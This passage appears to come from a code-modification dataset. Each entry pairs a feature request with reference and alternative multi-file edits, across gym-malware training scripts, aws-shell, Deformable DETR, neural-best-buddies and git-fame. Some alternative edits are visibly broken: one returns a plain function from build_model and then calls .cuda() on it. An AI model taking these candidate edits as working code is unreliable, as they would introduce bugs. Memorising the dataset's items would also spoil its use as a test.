upsampler(Variable(map_values)).data\n\ndef downsample_map(map_values, scale_factor):\n    if scale_factor == 1:\n        return map_values\n    else:\n        d = scale_factor\n        downsampler = torch.nn.AvgPool2d((d, d), stride=(d, d))\n        return downsampler(Variable(map_values)).data\n\ndef tensor2im(image_tensor, imtype=np.uint8, index=0):\n    image_numpy = image_tensor[index].cpu().float().numpy()\n    mean = np.zeros((1,1,3))\n    mean[0,0,:] = [0.485, 0.456, 0.406]\n    stdv = np.zeros((1,1,3))\n    stdv[0,0,:] = [0.229, 0.224, 0.225]\n    image_numpy = (np.transpose(image_numpy, (1, 2, 0)) * stdv + mean) * 255.0\n    if image_numpy.shape[2] == 1:\n        image_numpy = np.tile(image_numpy, [1,1,3])\n    return image_numpy.astype(imtype)\n\ndef feature2images(feature, size=[1,1], imtype=np.uint8):\n    feature_np = feature.cpu().float().numpy()\n    mosaic = np.zeros((size[0]*feature_np.shape[2], size[1]*feature_np.shape[3]))\n    for i in range(size[0]):\n       for j in range(size[1]):\n           single_feature = feature_np[0,i*size[1]+j,:,:]\n           stretched_feature = stretch_image(single_feature)\n           mosaic[(i*feature_np.shape[2]):(i+1)*(feature_np.shape[2]),\n               j*feature_np.shape[3]:(j+1)*(feature_np.shape[3])] = stretched_feature\n    mosaic = np.transpose(np.tile(mosaic, [3,1,1]), (1,2,0))\n    return mosaic.astype(np.uint8)\n\ndef grad2image(grad, imtype=np.uint8):\n    grad_np = grad.cpu().float().numpy()\n    image = np.zeros((grad.shape[2], grad.shape[3]))\n    for i in range(grad_np.shape[1]):\n           image = np.maximum(image, grad_np[0,i,:,:])\n    return stretch_image(image).astype(imtype)\n\ndef batch2im(images_tensor, imtype=np.uint8):\n    image_numpy = images_tensor.cpu().float().numpy()\n    image_numpy = (np.transpose(image_numpy, (0, 2, 3, 1)) + 1) / 2.0 * 255.0\n    return image_numpy.astype(imtype)\n\ndef map2image(values_map, imtype=np.uint8):\n    image_numpy = values_map[0].cpu().float().numpy()\n    image_numpy = np.transpose(image_numpy, (1, 2, 0))\n    image_numpy = stretch_image(image_numpy)\n    image_numpy = np.tile(image_numpy, [1,1,3])\n    return image_numpy.astype(imtype)\n\ndef binary2color_image(binary_map, color1=[0,185,252], color2=[245,117,255], imtype=np.uint8):\n    assert(binary_map.size(1)==1)\n    binary_ref = binary_map[0].cpu().float().numpy()\n    binary_ref = np.transpose(binary_ref, (1, 2, 0))\n    binary_ref = np.tile(binary_ref, [1,1,3])\n    color1_ref = np.tile(np.array(color1), [binary_map.size(2),binary_map.size(3),1])\n    color2_ref = np.tile(np.array(color2), [binary_map.size(2),binary_map.size(3),1])\n    color_map = binary_ref*color1_ref + (1-binary_ref)*color2_ref\n    return color_map.astype(imtype)\n\ndef stretch_image(image):\n    min_image = np.amin(image)\n    max_image = np.amax(image)\n    if max_image != min_image:\n        return (image - min_image)/(max_image - min_image)*255.0\n    else:\n        return image\n\ndef diagnose_network(net, name=\'network\'):\n    mean = 0.0\n    count = 0\n    for param in net.parameters():\n        if param.grad is not None:\n            mean += torch.mean(torch.abs(param.grad.data))\n            count += 1\n    if count &gt; 0:\n        mean = mean / count\n    print(name)\n    print(mean)\n\ndef save_image(image_numpy, image_path):\n    image_pil = Image.fromarray(image_numpy)\n    image_pil.save(image_path)\n\ndef save_tensor_as_mat(tensor, path):\n    tensor_numpy = tensor.cpu().numpy()\n    print(path)\n    scipy.io.savemat(path, mdict={\'dna\': tensor_numpy})\n\ndef info(object, spacing=10, collapse=1):\n    methodList = [e for e in dir(object) if isinstance(getattr(object, e), collections.Callable)]\n    processFunc = collapse and (lambda s: " ".join(s.split())) or (lambda s: s)\n    print( "\\n".join(["%s %s" %\n                     (method.ljust(spacing),\n                      processFunc(str(getattr(object, method).__doc__)))\n                     for method in methodList]) )\n\ndef varname(p):\n    for line in inspect.getframeinfo(inspect.currentframe().f_back)[3]:\n        m = re.search(r\'\\bvarname\\s*\\(\\s*([A-Za-z_][A-Za-z0-9_]*)\\s*\\)\', line)\n        if m:\n            return m.group(1)\n\ndef print_numpy(x, val=True, shp=False):\n    x = x.astype(np.float64)\n    if shp:\n        print(\'shape,\', x.shape)\n    if val:\n        x = x.flatten()\n        print(\'mean = %3.3f, min = %3.3f, max = %3.3f, median = %3.3f, std=%3.3f\' % (\n            np.mean(x), np.min(x), np.max(x), np.median(x), np.std(x)))\n\ndef mkdirs(paths):\n    if isinstance(paths, list) and not isinstance(paths, str):\n        for path in paths:\n            mkdir(path)\n    else:\n        mkdir(paths)\n\ndef mkdir(path):\n    if not os.path.exists(path):\n        os.makedirs(path)\n\ndef read_mask(path):\n    image = Image.open(path)\n    np_image = np.array(image)\n    np_image = np_image[:,:,0]\n    print(np_image.shape)\n    return np.where(np_image&gt;128, 1, 0)\n\n# File 2: rewriting/baselines/neural_best_buddies/get_missing.py\nimport os\nfrom netdissect import pidfile\nfrom options.options import Options\nfrom tqdm import tqdm\nopt = Options().parse()\n\ndef get_imgs():\n    img_nums = sorted([int(f.strip().split(f\'{base_name}_\')[1].split(\'.\')[0]) for f in os.listdir(opt.source)])\n    file_names = [f\'{base_name}_{num}.png\' for num in img_nums]\n    return img_nums, file_names\n\ndef get_imgnums(root):\n    base_name = os.path.basename(root)\n    img_nums = sorted([int(f.strip().split(f\'{base_name}_\')[1].split(\'.\')[0]) for f in os.listdir(root)])\n    file_names = [f\'{base_name}_{num}.png\' for num in img_nums]\n    return list(zip(img_nums, file_names))[:10000]\n\ndef check_missing(src_root, corr_root):\n    dne = []\n    for imgnum, file_path in tqdm(get_imgnums(src_root)):\n        if not os.path.exists(os.path.join(corr_root, str(imgnum), \'BtoA.npy\')):\n            dne.append(imgnum)\n    return dne\n\nmissing = check_missing(opt.source, opt.results_dir)\nbase_name = os.path.basename(opt.source)\n\ndef main():\n    import numpy as np\n    from models import vgg19_model\n    from algorithms import neural_best_buddies as NBBs\n    from util import util\n    from util import MLS\n\n    vgg19 = vgg19_model.define_Vgg19(opt)\n    img_nums, images = get_imgs()\n    #New\n    image_metadata = {}\n\n    for imgnum in tqdm(missing):\n        print(imgnum)\n        save_dir = os.path.join(opt.results_dir, str(imgnum))\n        if os.path.exists(os.path.join(save_dir, \'BtoA.npy\')): \n            continue\n        try:\n            print(\'Working on\', imgnum)\n            source_path = os.path.join(opt.source, f\'{base_name}_{imgnum}.png\')\n            #Modify\n            A, metadata_A = util.read_image(source_path, opt.imageSize)\n            B, metadata_B = util.read_image(opt.target, opt.imageSize)\n            #New\n            image_metadata[imgnum] = {\'source\': metadata_A, \'target\': metadata_B}\n            print(A.shape, B.shape)\n            print(f\'Source metadata: {metadata_A}\')\n            print(f\'Target metadata: {metadata_B}\')\n            nbbs = NBBs.sparse_semantic_correspondence(vgg19, opt.gpu_ids, opt.tau,\n                                                    opt.border_size, save_dir,\n                                                    opt.k_per_level, opt.k_final,\n                                                    opt.fast)\n            points = nbbs.run(A, B)\n            mls = MLS.MLS(v_class=np.int32)\n            mls.run_MLS_in_folder(root_folder=save_dir)\n        except Exception as e:\n            print(e)\n            with open(os.path.join(save_dir, \'no_correspondence.txt\'), \'w\') as f:\n                f.write(\'\')\n\nif __name__ == "__main__":\n    main()'}</t>
  </si>
  <si>
    <t>{'#file 1': "def read_image(path, witdh):\n    I = Image.open(path).convert('RGB')\n    transform = get_transform(witdh)\n    return transform(I).unsqueeze(0)  #Modify: This function is now deprecated and should be replaced by read_image_with_metadata from #file 3", '#file 2': "from util import read_image_with_metadata  #New: Import the new function\n\nsource_path = os.path.join(opt.source, f'{base_name}_{imgnum}.png')\nA, _ = read_image_with_metadata(source_path, opt.imageSize)  #Modify: Update to use the new function\nB, _ = read_image_with_metadata(opt.target, opt.imageSize)  #Modify: Update to use the new function", '#file 3': "def read_image_with_metadata(path, width):\n    I = Image.open(path).convert('RGB')\n    transform = get_transform(width)\n    image_tensor = transform(I).unsqueeze(0)\n    metadata = {'path': path, 'width': width}\n    return image_tensor, metadata  #New: Function to read image and return metadata"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'register() function calls in gym_malware/__init__.py that register the malware environments', 'invoking_code_segment': 'gym.make(ENV_NAME) and gym.make(TEST_NAME) calls in train_agent_kerasrl.py that create the registered environments', 'feature_description': 'Add functionality to save and load models and history with automatic persistence. This includes creating utility functions in __init__.py for saving/loading models and history objects, and modifying train_agent_kerasrl.py to use these utilities with automatic checkpoint management.', 'modified_complete_code': '# File 1: gym-malware/gym_malware/__init__.py\nfrom gym.envs.registration import register\nimport os\nimport pickle\nfrom keras.models import load_model\n\n# get samples for environment\nfrom gym_malware.envs.utils import interface, pefeatures\nsha256 = interface.get_available_sha256()\n# create a holdout set\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\nnp.random.seed(123)\nsha256_train, sha256_holdout = train_test_split(sha256, test_size=200)\n\nMAXTURNS = 10\n\nregister(\n    id=\'malware-v0\',\n    entry_point=\'gym_malware.envs:MalwareEnv\',\n    kwargs={\'random_sample\': True, \'maxturns\': MAXTURNS, \'sha256list\': sha256_train}\n)\n\nregister(\n    id=\'malware-test-v0\',\n    entry_point=\'gym_malware.envs:MalwareEnv\',\n    kwargs={\'random_sample\': False, \'maxturns\': MAXTURNS, \'sha256list\': sha256_holdout}\n)\n\nregister(\n    id=\'malware-score-v0\',\n    entry_point=\'gym_malware.envs:MalwareScoreEnv\',\n    kwargs={\'random_sample\': True, \'maxturns\': MAXTURNS, \'sha256list\': sha256_train}\n)\n\nregister(\n    id=\'malware-score-test-v0\',\n    entry_point=\'gym_malware.envs:MalwareScoreEnv\',\n    kwargs={\'random_sample\': False, \'maxturns\': MAXTURNS, \'sha256list\': sha256_holdout}\n)\n\n# New: Utility functions for saving and loading models and history\ndef save_model(model, filepath):\n    """Save a Keras model to disk."""\n    os.makedirs(os.path.dirname(filepath), exist_ok=True)\n    model.save(filepath, overwrite=True)\n    print(f"Model saved to {filepath}")\n\ndef load_model_from_file(filepath):\n    """Load a Keras model from disk."""\n    if os.path.exists(filepath):\n        return load_model(filepath)\n    else:\n        raise FileNotFoundError(f"Model file not found: {filepath}")\n\ndef save_history(history, filepath):\n    """Save training/testing history to disk using pickle."""\n    os.makedirs(os.path.dirname(filepath), exist_ok=True)\n    with open(filepath, \'wb\') as f:\n        pickle.dump(history, f, pickle.HIGHEST_PROTOCOL)\n    print(f"History saved to {filepath}")\n\ndef load_history(filepath):\n    """Load training/testing history from disk using pickle."""\n    if os.path.exists(filepath):\n        with open(filepath, \'rb\') as f:\n            return pickle.load(f)\n    else:\n        raise FileNotFoundError(f"History file not found: {filepath}")\n\n# File 2: gym-malware/train_agent_kerasrl.py\nimport pickle\nimport numpy as np\nimport gym\nnp.random.seed(123) # set a random seed when setting up the gym environment (train_test_split)\nimport gym_malware\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation, Flatten, ELU, Dropout, BatchNormalization\nfrom keras.optimizers import Adam, SGD, RMSprop\n\n# pip install keras-rl\nfrom rl.agents.dqn import DQNAgent\nfrom rl.agents.sarsa import SarsaAgent\nfrom rl.policy import BoltzmannQPolicy\nfrom rl.memory import SequentialMemory\n\n\ndef generate_dense_model(input_shape, layers, nb_actions):\n    model = Sequential()\n    model.add(Flatten(input_shape=input_shape))\n    model.add(Dropout(0.1))  # drop out the input to make model less sensitive to any 1 feature\n\n    for layer in layers:\n        model.add(Dense(layer))\n        model.add(BatchNormalization())\n        model.add(ELU(alpha=1.0))\n\n    model.add(Dense(nb_actions))\n    model.add(Activation(\'linear\'))\n    print(model.summary())\n\n    return model\n\n\n# Modify: Updated function signature to include save_path parameter\ndef train_dqn_model(layers, rounds=10000, run_test=False, use_score=False, save_path=None):\n    ENV_NAME = \'malware-score-v0\' if use_score else \'malware-v0\'\n    env = gym.make(ENV_NAME)\n    env.seed(123)\n    nb_actions = env.action_space.n\n    window_length = 1  # "experience" consists of where we were, where we are now\n\n    # generate a policy model\n    model = generate_dense_model((window_length,) + env.observation_space.shape, layers, nb_actions)\n\n    # configure and compile our agent\n    # BoltzmannQPolicy selects an action stochastically with a probability generated by soft-maxing Q values\n    policy = BoltzmannQPolicy()\n\n    # memory can help a model during training\n    # for this, we only consider a single malware sample (window_length=1) for each "experience"\n    memory = SequentialMemory(limit=32, ignore_episode_boundaries=False, window_length=window_length)\n\n    # DQN agent as described in Mnih (2013) and Mnih (2015).\n    # http://arxiv.org/pdf/1312.5602.pdf\n    # http://arxiv.org/abs/1509.06461\n    agent = DQNAgent(model=model, nb_actions=nb_actions, memory=memory, nb_steps_warmup=16,\n                     enable_double_dqn=True, enable_dueling_network=True, dueling_type=\'avg\',\n                     target_model_update=1e-2, policy=policy, batch_size=16)\n\n    # keras-rl allows one to use and built-in keras optimizer\n    agent.compile(RMSprop(lr=1e-3), metrics=[\'mae\'])\n\n    # play the game. learn something!\n    agent.fit(env, nb_steps=rounds, visualize=False, verbose=2)\n\n    history_train = env.history\n    history_test = None\n\n    if run_test:\n        # Set up the testing environment\n        TEST_NAME = \'malware-score-test-v0\' if use_score else \'malware-test-v0\'\n        test_env = gym.make(TEST_NAME)\n\n        # evaluate the agent on a few episodes, drawing randomly from the test samples\n        agent.test(test_env, nb_episodes=100, visualize=False)\n        history_test = test_env.history\n\n    # New: Save model and history if save_path is provided\n    if save_path:\n        gym_malware.save_model(model, f"{save_path}/model.h5")\n        gym_malware.save_history(history_train, f"{save_path}/history_train.pickle")\n        if history_test is not None:\n            gym_malware.save_history(history_test, f"{save_path}/history_test.pickle")\n\n    return agent, model, history_train, history_test\n\n\nif __name__ == \'__main__\':\n    # Modify: Updated calls to train_dqn_model with save_path parameter\n    agent1, model1, history_train1, history_test1 = train_dqn_model([1024, 256], rounds=50000, run_test=True, use_score=False, save_path=\'models/blackbox\')  # black box\n    # New: Alternative manual save using gym_malware utilities\n    # gym_malware.save_model(model1, \'models/dqn.h5\')\n    # gym_malware.save_history(history_test1, \'history_blackbox.pickle\')\n\n    agent2, model2, history_train2, history_test2 = train_dqn_model([1024, 256], rounds=50000, run_test=True, use_score=True, save_path=\'models/score\')  # allow agent to see scores\n    # New: Alternative manual save using gym_malware utilities\n    # gym_malware.save_model(model2, \'models/dqn_score.h5\')\n    # gym_malware.save_history(history_test2, \'history_score.pickle\')'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def train_dqn_model(layers, rounds=10000, run_test=False, use_score=False):\n    ENV_NAME = \'malware-score-v0\' if use_score else \'malware-v0\'\n    env = gym.make(ENV_NAME)\n    env.seed(123)\n    nb_actions = env.action_space.n\n    window_length = 1  # "experience" consists of where we were, where we are now\n\n    # generate a policy model\n    model = generate_dense_model((window_length,) + env.observation_space.shape, layers, nb_actions)\n\n    # configure and compile our agent\n    # BoltzmannQPolicy selects an action stochastically with a probability generated by soft-maxing Q values\n    policy = BoltzmannQPolicy()\n\n    # memory can help a model during training\n    # for this, we only consider a single malware sample (window_length=1) for each "experience"\n    memory = SequentialMemory(limit=32, ignore_episode_boundaries=False, window_length=window_length)\n\n    # DQN agent as described in Mnih (2013) and Mnih (2015).\n    # http://arxiv.org/pdf/1312.5602.pdf\n    # http://arxiv.org/abs/1509.06461\n    agent = DQNAgent(model=model, nb_actions=nb_actions, memory=memory, nb_steps_warmup=16,\n                     enable_double_dqn=True, enable_dueling_network=True, dueling_type=\'avg\',\n                     target_model_update=1e-2, policy=policy, batch_size=16)\n\n    # keras-rl allows one to use and built-in keras optimizer\n    agent.compile(RMSprop(lr=1e-3), metrics=[\'mae\'])\n\n    # play the game. learn something!\n    agent.fit(env, nb_steps=rounds, visualize=False, verbose=2)\n\n    history_train = env.history\n    history_test = None\n\n    if run_test:\n        # Set up the testing environment\n        TEST_NAME = \'malware-score-test-v0\' if use_score else \'malware-test-v0\'\n        test_env = gym.make(TEST_NAME)\n\n        # evaluate the agent on a few episodes, drawing randomly from the test samples\n        agent.test(test_env, nb_episodes=100, visualize=False)\n        history_test = test_env.history\n\n    return agent, model, history_train, history_test\n\n#Modify\ndef save_model_and_history(agent, model, history_train, history_test, model_path, history_path):\n    model.save(model_path, overwrite=True)\n    with open(history_path, \'wb\') as f:\n        pickle.dump(history_test, f, pickle.HIGHEST_PROTOCOL)\n\n#New\ndef load_model_and_history(model_path, history_path):\n    from keras.models import load_model\n    model = load_model(model_path)\n    with open(history_path, \'rb\') as f:\n        history_test = pickle.load(f)\n    return model, history_test', '#file 2': "if __name__ == '__main__':\n    agent1, model1, history_train1, history_test1 = train_dqn_model([1024, 256], rounds=50000, run_test=True, use_score=False)  # black blox\n    save_model_and_history(agent1, model1, history_train1, history_test1, 'models/dqn.h5', 'history_blackbox.pickle')\n\n    agent2, model2, history_train2, history_test2 = train_dqn_model([1024, 256], rounds=50000, run_test=True, use_score=True)  # allow agent to see scores\n    save_model_and_history(agent2, model2, history_train2, history_test2, 'models/dqn_score.h5', 'history_score.pickle')", '#file 3': "def save_model_and_history(agent, model, history_train, history_test, model_path, history_path):\n    model.save(model_path, overwrite=True)\n    with open(history_path, 'wb') as f:\n        pickle.dump(history_test, f, pickle.HIGHEST_PROTOCOL)\n\n#New\ndef load_model_and_history(model_path, history_path):\n    from keras.models import load_model\n    model = load_model(model_path)\n    with open(history_path, 'rb') as f:\n        history_test = pickle.load(f)\n    return model, history_test"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'class ExitHandler(object):\n    def run(self, command, application):\n        return EXIT_REQUESTED', 'invoking_code_segment': "if text.startswith('.'):\n    result = self._dot_cmd.handle_cmd(text, application=self)\n    if result is EXIT_REQUESTED:\n        break", 'feature_description': "Add a custom exit message when the '.quit' or '.exit' command is invoked. The ExitHandler will now accept an optional output parameter and print a farewell message before returning EXIT_REQUESTED. The AWSShell.run() method will handle the exit message display.", 'modified_complete_code': '# File 1: aws-shell/awsshell/app.py\n\n# Modify ExitHandler class\nclass ExitHandler(object):\n    # New: Add output parameter to constructor\n    def __init__(self, output=sys.stdout):\n        self._output = output\n    \n    def run(self, command, application):\n        # New: Print custom exit message\n        self._output.write("Goodbye!\\n")\n        return EXIT_REQUESTED\n\n# Modify DotCommandHandler.handle_cmd method\nclass DotCommandHandler(object):\n    HANDLER_CLASSES = {\n        \'edit\': EditHandler,\n        \'profile\': ProfileHandler,\n        \'cd\': ChangeDirHandler,\n        \'exit\': ExitHandler,\n        \'quit\': ExitHandler,\n    }\n\n    def __init__(self, output=sys.stdout, err=sys.stderr):\n        self._output = output\n        self._err = err\n\n    def handle_cmd(self, command, application):\n        """Handle running a given dot command from a user.\n\n        :type command: str\n        :param command: The full dot command string, e.g. ``.edit``,\n            of ``.profile prod``.\n\n        :type application: AWSShell\n        :param application: The application object.\n\n        """\n        parts = command.split()\n        cmd_name = parts[0][1:]\n        if cmd_name not in self.HANDLER_CLASSES:\n            self._unknown_cmd(parts, application)\n        else:\n            # Modify: Pass output parameter for ExitHandler\n            handler_class = self.HANDLER_CLASSES[cmd_name]\n            if cmd_name in (\'exit\', \'quit\'):\n                handler = handler_class(output=self._output)\n            else:\n                handler = handler_class()\n            return handler.run(parts, application)\n\n    def _unknown_cmd(self, cmd_parts, application):\n        self._err.write("Unknown dot command: %s\\n" % cmd_parts[0])\n\n# File 2: aws-shell/tests/unit/test_app.py\n\n# New: Add test for exit message\ndef test_exit_handler_prints_goodbye_message():\n    stdout = compat.StringIO()\n    handler = app.ExitHandler(output=stdout)\n    result = handler.run([\'.quit\'], None)\n    assert stdout.getvalue() == "Goodbye!\\n"\n    assert result is app.EXIT_REQUESTED\n\n# Modify existing test_exit_dot_command_exits_shell to verify message\ndef test_exit_dot_command_exits_shell():\n    mock_prompter = mock.Mock()\n    # Simulate the user entering \'.quit\'\n    fake_document = mock.Mock()\n    fake_document.text = \'.quit\'\n    mock_prompter.run.return_value = fake_document\n    # Modify: Capture output to verify exit message\n    stdout = compat.StringIO()\n    shell = app.AWSShell(mock.Mock(), mock.Mock(), mock.Mock())\n    shell._output = stdout\n    shell._dot_cmd = app.DotCommandHandler(output=stdout)\n    shell.create_cli_interface = mock.Mock(return_value=mock_prompter)\n    shell.run()\n\n    # Should have only called run() once.  As soon as we\n    # see the .quit command, we immediately exit and stop prompting\n    # for more shell commands.\n    assert mock_prompter.run.call_count == 1\n    # Modify: Verify goodbye message was printed\n    assert "Goodbye!" in stdout.getvalue()'}</t>
  </si>
  <si>
    <t>{'#file 1': "class DotCommandHandler(object):\n    HANDLER_CLASSES = {\n        'edit': EditHandler,\n        'profile': ProfileHandler,\n        'cd': ChangeDirHandler,\n        'exit': CustomExitHandler,\n        'quit': CustomExitHandler,\n    }\n\n    def __init__(self, output=sys.stdout, err=sys.stderr):\n        self._output = output\n        self._err = err\n\n    def handle_cmd(self, command, application):\n        parts = command.split()\n        cmd_name = parts[0][1:]\n        if cmd_name not in self.HANDLER_CLASSES:\n            self._unknown_cmd(parts, application)\n        else:\n            return self.HANDLER_CLASSES[cmd_name]().run(parts, application)", '#file 2': "def test_exit_dot_command_exits_shell():\n    mock_prompter = mock.Mock()\n    # Simulate the user entering '.quit'\n    fake_document = mock.Mock()\n    fake_document.text = '.quit'\n    mock_prompter.run.return_value = fake_document\n    shell = app.AWSShell(mock.Mock(), mock.Mock(), mock.Mock())\n    shell.create_cli_interface = mock.Mock(return_value=mock_prompter)\n    with mock.patch('sys.stdout', new_callable=StringIO) as mock_stdout:\n        shell.run()\n    assert 'Custom exit message' in mock_stdout.getvalue()", '#file 3': "#New\nclass CustomExitHandler(object):\n    def run(self, command, application):\n        print('Custom exit message')\n        return app.EXIT_REQUESTED"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def build_model(args):\n    return build(args)', 'invoking_code_segment': 'model, _, _ = build_model(main_args)', 'feature_description': 'Add an additional feature that prints a message before executing the model inference', 'modified_complete_code': '# File 1: Deformable-DETR/models/__init__.py\n# ------------------------------------------------------------------------\n# Deformable DETR\n# Copyright (c) 2020 SenseTime. All Rights Reserved.\n# Licensed under the Apache License, Version 2.0 [see LICENSE for details]\n# ------------------------------------------------------------------------\n# Modified from DETR (https://github.com/facebookresearch/detr)\n# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved\n# ------------------------------------------------------------------------\n\nfrom .deformable_detr import build\n\n\ndef build_model(args):\n    #Modify: Add print statement before returning model\n    print("Building Deformable DETR model...")\n    return build(args)\n\n\n# File 2: Deformable-DETR/benchmark.py\n# ------------------------------------------------------------------------\n# Deformable DETR\n# Copyright (c) 2020 SenseTime. All Rights Reserved.\n# Licensed under the Apache License, Version 2.0 [see LICENSE for details]\n# ------------------------------------------------------------------------\n\n"""\nBenchmark inference speed of Deformable DETR.\n"""\nimport os\nimport time\nimport argparse\n\nimport torch\n\nfrom main import get_args_parser as get_main_args_parser\nfrom models import build_model\nfrom datasets import build_dataset\nfrom util.misc import nested_tensor_from_tensor_list\n\n\ndef get_benckmark_arg_parser():\n    parser = argparse.ArgumentParser(\'Benchmark inference speed of Deformable DETR.\')\n    parser.add_argument(\'--num_iters\', type=int, default=300, help=\'total iters to benchmark speed\')\n    parser.add_argument(\'--warm_iters\', type=int, default=5, help=\'ignore first several iters that are very slow\')\n    parser.add_argument(\'--batch_size\', type=int, default=1, help=\'batch size in inference\')\n    parser.add_argument(\'--resume\', type=str, help=\'load the pre-trained checkpoint\')\n    return parser\n\n\n@torch.no_grad()\ndef measure_average_inference_time(model, inputs, num_iters=100, warm_iters=5):\n    ts = []\n    #New: Print message before inference\n    print("Starting model inference measurements...")\n    for iter_ in range(num_iters):\n        torch.cuda.synchronize()\n        t_ = time.perf_counter()\n        model(inputs)\n        torch.cuda.synchronize()\n        t = time.perf_counter() - t_\n        if iter_ &gt;= warm_iters:\n          ts.append(t)\n    print(ts)\n    return sum(ts) / len(ts)\n\n\ndef benchmark():\n    args, _ = get_benckmark_arg_parser().parse_known_args()\n    main_args = get_main_args_parser().parse_args(_)\n    assert args.warm_iters &lt; args.num_iters and args.num_iters &gt; 0 and args.warm_iters &gt;= 0\n    assert args.batch_size &gt; 0\n    assert args.resume is None or os.path.exists(args.resume)\n    dataset = build_dataset(\'val\', main_args)\n    #Modify: Add print statement before building model\n    print("Initializing model for benchmarking...")\n    model, _, _ = build_model(main_args)\n    model.cuda()\n    model.eval()\n    if args.resume is not None:\n        ckpt = torch.load(args.resume, map_location=lambda storage, loc: storage)\n        model.load_state_dict(ckpt[\'model\'])\n    inputs = nested_tensor_from_tensor_list([dataset.__getitem__(0)[0].cuda() for _ in range(args.batch_size)])\n    t = measure_average_inference_time(model, inputs, args.num_iters, args.warm_iters)\n    return 1.0 / t * args.batch_size\n\n\nif __name__ == \'__main__\':\n    fps = benchmark()\n    print(f\'Inference Speed: {fps:.1f} FPS\')'}</t>
  </si>
  <si>
    <t>{'#file 1': 'from models.deformable_detr import build\nfrom models.additional_feature import additional_feature  #New\n\n#Modify\ndef build_model(args):\n    model = build(args)\n    def wrapped_model(inputs):\n        return additional_feature(model, inputs)\n    return wrapped_model', '#file 2': "from main import get_args_parser as get_main_args_parser\nfrom models import build_model\nfrom datasets import build_dataset\nfrom util.misc import nested_tensor_from_tensor_list\n\n@torch.no_grad()\ndef measure_average_inference_time(model, inputs, num_iters=100, warm_iters=5):\n    ts = []\n    for iter_ in range(num_iters):\n        torch.cuda.synchronize()\n        t_ = time.perf_counter()\n        model(inputs)\n        torch.cuda.synchronize()\n        t = time.perf_counter() - t_\n        if iter_ &gt;= warm_iters:\n          ts.append(t)\n    print(ts)\n    return sum(ts) / len(ts)\n\ndef benchmark():\n    args, _ = get_benckmark_arg_parser().parse_known_args()\n    main_args = get_main_args_parser().parse_args(_)\n    assert args.warm_iters &lt; args.num_iters and args.num_iters &gt; 0 and args.warm_iters &gt;= 0\n    assert args.batch_size &gt; 0\n    assert args.resume is None or os.path.exists(args.resume)\n    dataset = build_dataset('val', main_args)\n    model = build_model(main_args)\n    model.cuda()\n    model.eval()\n    if args.resume is not None:\n        ckpt = torch.load(args.resume, map_location=lambda storage, loc: storage)\n        model.load_state_dict(ckpt['model'])\n    inputs = nested_tensor_from_tensor_list([dataset.__getitem__(0)[0].cuda() for _ in range(args.batch_size)])\n    t = measure_average_inference_time(model, inputs, args.num_iters, args.warm_iters)\n    return 1.0 / t * args.batch_size\n\nif __name__ == '__main__':\n    fps = benchmark()\n    print(f'Inference Speed: {fps:.1f} FPS')", '#file 3': "def additional_feature(model, inputs):\n    # New feature implementation\n    print('Additional feature executed')\n    return model(inputs)"}</t>
  </si>
  <si>
    <t>{'called_code_segment': "def tabulate(auth_stats, stats_tot, cost=None, backend='builtin', row_nums=False):", 'invoking_code_segment': 'def test_tabulate():\n    assert (_gitfame.tabulate(auth_stats, stats_tot) == dedent(...))\n\ndef test_tabulate_cost():\n    assert (_gitfame.tabulate(auth_stats, stats_tot, cost={"hours", "months"}) == dedent(...))\n\ndef test_tabulate_yaml():\n    assert (_gitfame.tabulate(auth_stats, stats_tot, backend=\'yaml\') in res)\n\ndef test_tabulate_json():\n    res = loads(_gitfame.tabulate(auth_stats, stats_tot, backend=\'json\'))\n\ndef test_tabulate_csv():\n    csv = _gitfame.tabulate(auth_stats, stats_tot, backend=\'csv\')\n    tsv = _gitfame.tabulate(auth_stats, stats_tot, backend=\'tsv\')\n\ndef test_tabulate_tabulate():\n    assert (_gitfame.tabulate(auth_stats, stats_tot, backend=\'simple\') == dedent(...))\n\ndef test_tabulate_enum():\n    res = loads(_gitfame.tabulate(auth_stats, stats_tot, backend=\'json\', row_nums=True))\n\ndef test_tabulate_unknown():\n    _gitfame.tabulate(auth_stats, stats_tot, backend=\'1337\')', 'feature_description': "Add a new custom tabulate feature that formats statistics in a custom way. This includes adding a new 'custom' backend option to the tabulate function that allows users to format author statistics with customizable separators, headers, and data formatting. The feature supports custom formatting with configurable column separators, row separators, and header styles.", 'modified_complete_code': '# File 1: git-fame/gitfame/_utils.py - Add new utility function\n# #New - Add custom formatter utility function\ndef format_custom(data, separator=\'|\', header_char=\'=\', include_header=True):\n    """\n    Format data in a custom way with configurable separators and headers.\n    \n    Args:\n        data: List of lists containing the data to format\n        separator: Character to separate columns (default: \'|\')\n        header_char: Character for header underline (default: \'=\')\n        include_header: Whether to include header row (default: True)\n    \n    Returns:\n        Formatted string representation of data\n    """\n    if not data:\n        return \'\'\n    \n    # Calculate column widths\n    col_widths = [max(len(str(row[i])) for row in data) for i in range(len(data[0]))]\n    \n    lines = []\n    for row_idx, row in enumerate(data):\n        formatted_row = separator.join(\n            str(cell).ljust(col_widths[i]) for i, cell in enumerate(row)\n        )\n        lines.append(formatted_row)\n        \n        # Add header separator after first row if include_header is True\n        if include_header and row_idx == 0:\n            separator_line = separator.join(\n                header_char * col_widths[i] for i in range(len(row))\n            )\n            lines.append(separator_line)\n    \n    return \'\\n\'.join(lines)\n\n# File 2: git-fame/gitfame/_gitfame.py - Modify tabulate function\n# #Modify - Add \'custom\' backend support to tabulate function\ndef tabulate(auth_stats, stats_tot, cost=None, backend=\'builtin\', row_nums=False, custom_sep=\'|\', custom_header_char=\'=\'):\n    """\n    Tabulate statistics with support for multiple backends including custom formatting.\n    \n    Args:\n        auth_stats: Dictionary of author statistics\n        stats_tot: Dictionary of total statistics\n        cost: Set of cost metrics to include (optional)\n        backend: Output format backend (\'builtin\', \'json\', \'yaml\', \'csv\', \'tsv\', \'simple\', \'custom\')\n        row_nums: Whether to include row numbers\n        custom_sep: Separator character for custom backend (default: \'|\')\n        custom_header_char: Header underline character for custom backend (default: \'=\')\n    \n    Returns:\n        Formatted statistics string\n    """\n    # #Modify - Existing code for other backends remains unchanged\n    # ... existing backend handling code ...\n    \n    # #New - Add custom backend handling\n    if backend == \'custom\':\n        from gitfame._utils import format_custom\n        \n        # Prepare data for custom formatting\n        headers = [\'Author\', \'loc\', \'coms\', 